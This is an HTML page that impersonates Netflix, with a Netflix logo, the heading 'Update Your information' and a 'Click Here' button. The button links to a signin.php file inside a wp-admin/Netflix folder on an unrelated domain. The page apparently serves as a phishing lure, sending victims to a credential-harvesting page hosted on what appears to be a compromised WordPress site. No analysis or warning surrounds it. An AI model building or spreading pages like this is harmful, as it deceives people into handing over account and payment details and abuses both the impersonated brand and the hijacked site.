<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f8f8f8;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            width: 300px;
            text-align: center;
        }
        h1 {
            margin-top: 0;
        }
        p {
            margin-bottom: 20px;
        }
        .logo {
            max-width: 250px;
            margin: 0 auto;
        }
        button {
            background-color: #000080;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            width: 100%;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="container">
        <img class="logo" src="https://seeklogo.com/images/N/netflix-logo-B24AFC06E5-seeklogo.com.png" alt="NETFLIX Logo">
        <h1>Update Your information </h1>
        <a href="https://bella-sera.co.uk/wp-admin/Netflix/signin.php" target="_blank">
            <button>Click Here</button>
        </a>
    </div>
</body>
</html>
